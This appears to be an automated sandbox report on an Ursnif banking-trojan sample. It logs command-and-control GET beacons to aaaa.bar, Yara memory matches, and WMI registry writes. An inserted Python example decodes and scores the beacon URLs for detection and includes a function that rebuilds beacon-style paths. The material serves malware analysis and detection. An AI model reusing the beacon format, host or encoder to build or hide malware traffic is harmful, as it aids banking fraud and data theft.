Source: global traffic, HTTP traffic detected: GET /jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2B/ce4ORl02hRz9Esp/_2BVvpIh9LurZ83S_2/B0O2_2FdR/gIrNQT1mMUiZ_2BS_2BT/MDTnU5RczKhEBmBWqGJ/EyrDp1_2FuqKMBIze3vzAt/t9EP4e8z_2FDf/kKFLZbmvwAVEbK/QjYP.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
Source: global traffic, HTTP traffic detected: GET /jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
Source: global traffic, HTTP traffic detected: GET /jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
Source: global traffic, HTTP traffic detected: GET /jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en
Source: global traffic, HTTP traffic detected: GET /jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
Source: global traffic, HTTP traffic detected: GET /jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
Source: global traffic, HTTP traffic detected: GET /jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
Source: global traffic, HTTP traffic detected: GET /jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en
Source: global traffic, HTTP traffic detected: GET /jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
Source: global traffic, HTTP traffic detected: GET /jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
                      Source: unknown; HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49784 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49785 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49821 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49820 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49827 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49825 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49826 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49824 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49837 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49836 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49835 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49834 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49952 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49954 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49963 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49969 version: TLS 1.2
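                      The ten GET requests to aaaa.bar above share one shape: a /jdraw/ prefix, a .crw suffix, path segments drawn from the base64 alphabet with _2B and _2F in place of + and /, and a User-Agent claiming MSIE 8.0 on Windows NT 10.0. The Python below is an added example, not part of the sandbox output: it extracts the encoded blob from such a path and names the indicators a proxy or NDR rule could key on. The mapping of _2B and _2F to + and / is an inference from the URLs (they are the percent-encodings of those two characters with _ for %), and the padding handling is an assumption; the decoded bytes are the bot's encrypted request data, which this example does not decrypt because the report gives no key. The sample path and headers are copied from the fifth request on the page.

```python
"""Indicator extraction for the /jdraw/.../*.crw beacon URLs in this report.
Added example, not part of the sandbox output."""
import base64
import re
from typing import Dict, List, Optional

# Observed on the page: every request carried exactly this User-Agent string.
UA_SEEN = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"
PATH_RE = re.compile(r"^/jdraw/([A-Za-z0-9_/]+)\.crw$")


def ua_is_inconsistent(ua: str) -> bool:
    """IE 8 never shipped on Windows 10 (the 'Windows NT 10.0' token); a real
    browser does not produce this pairing, a hard-coded client string does."""
    return "MSIE 8.0" in ua and "Windows NT 10.0" in ua


def extract_blob(path: str) -> Optional[bytes]:
    """Return the bytes encoded in a beacon path, or None if the path does not
    follow the observed layout.

    Assumption: _2B and _2F stand for %2B ('+') and %2F ('/'), i.e. the payload
    is standard base64 with its two URL-hostile characters escaped and '/'
    separators inserted at arbitrary positions.  A separator can split an
    escape (the page shows '...S_2/B0O2...'), so separators are stripped before
    the escapes are undone.
    """
    m = PATH_RE.match(path)
    if m is None:
        return None
    b64 = m.group(1).replace("/", "").replace("_2B", "+").replace("_2F", "/")
    if "_" in b64:                      # an escape we do not know how to undo
        return None
    b64 += "=" * (-len(b64) % 4)        # assumption: '=' padding was stripped
    try:
        return base64.b64decode(b64, validate=True)
    except ValueError:
        return None


def encode_blob(data: bytes, segment: int = 12) -> str:
    """Inverse of extract_blob, used here only to show the round trip.
    The sample varies its segment length per request; 12 is arbitrary."""
    b64 = base64.b64encode(data).decode().rstrip("=")
    esc = b64.replace("+", "_2B").replace("/", "_2F")
    parts = [esc[i:i + segment] for i in range(0, len(esc), segment)]
    return "/jdraw/" + "/".join(parts) + ".crw"


def score_request(path: str, headers: Dict[str, str]) -> List[str]:
    """Name the structural indicators present in one request."""
    hits: List[str] = []
    if PATH_RE.match(path):
        hits.append("path_jdraw_crw")
    if extract_blob(path) is not None:
        hits.append("path_is_base64_blob")
    if ua_is_inconsistent(headers.get("User-Agent", "")):
        hits.append("ua_ie8_on_windows10")
    return hits


# Copied from the fifth GET request on the page (Host: aaaa.bar).
SAMPLE_PATH = ("/jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/"
               "2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/"
               "It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/"
               "Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw")
SAMPLE_HEADERS = {"User-Agent": UA_SEEN, "Host": "aaaa.bar",
                  "Connection": "Keep-Alive", "Cache-Control": "no-cache",
                  "Cookie": "lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3"}

if __name__ == "__main__":
    blob = extract_blob(SAMPLE_PATH)
    print(score_request(SAMPLE_PATH, SAMPLE_HEADERS), len(blob or b""), "bytes")
```

Two of the three indicators are static strings and would be trivial for the operator to change; the blob test is the durable one, since any path that base64-decodes cleanly after undoing the escapes is carrying data rather than naming a file.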

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara match; File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
                      Source: Yara match; File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: Yara match; File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
                      Source: Yara match; File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
